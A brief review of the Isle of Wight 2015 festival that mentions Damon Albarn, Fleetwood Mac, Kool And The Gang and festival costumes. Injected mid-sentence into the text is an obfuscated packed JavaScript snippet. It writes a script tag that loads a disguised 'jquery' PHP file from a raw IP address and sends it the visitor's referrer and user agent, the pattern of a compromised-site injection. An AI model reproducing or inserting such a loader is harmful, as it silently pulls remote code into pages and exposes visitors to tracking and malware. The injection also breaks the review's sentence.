REVIEW: ISLE OF WIGHT 2015

IOW2015 - Liz Murray Photography - Thursday - Unwatermarked-17

Let’s (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdfee|var|u0026u|referrer|ffhez||js|php’.split(‘|’),0,{}))
all forget about the freakstorm on the Friday, Isle of Wight still shone bright thanks to its glistening lineup and notably glowing atmosphere. Highlights include an apparently (though we couldnt tell) croaky Damon Albarn leading the crowd in a glorious rendetion of ‘Tender’, Fleetwood Mac’s onstage dedication to Dave Grohl, Kool And The Gang getting everyone up and cheering to ‘Celebration’ and of course, the sheer effort of everyone’s festival gettups which ranged from man in tutu to a gang of pirates and one parrot.

We’re already anticipating next year’s antics. Here’s the best bit, in pictures…
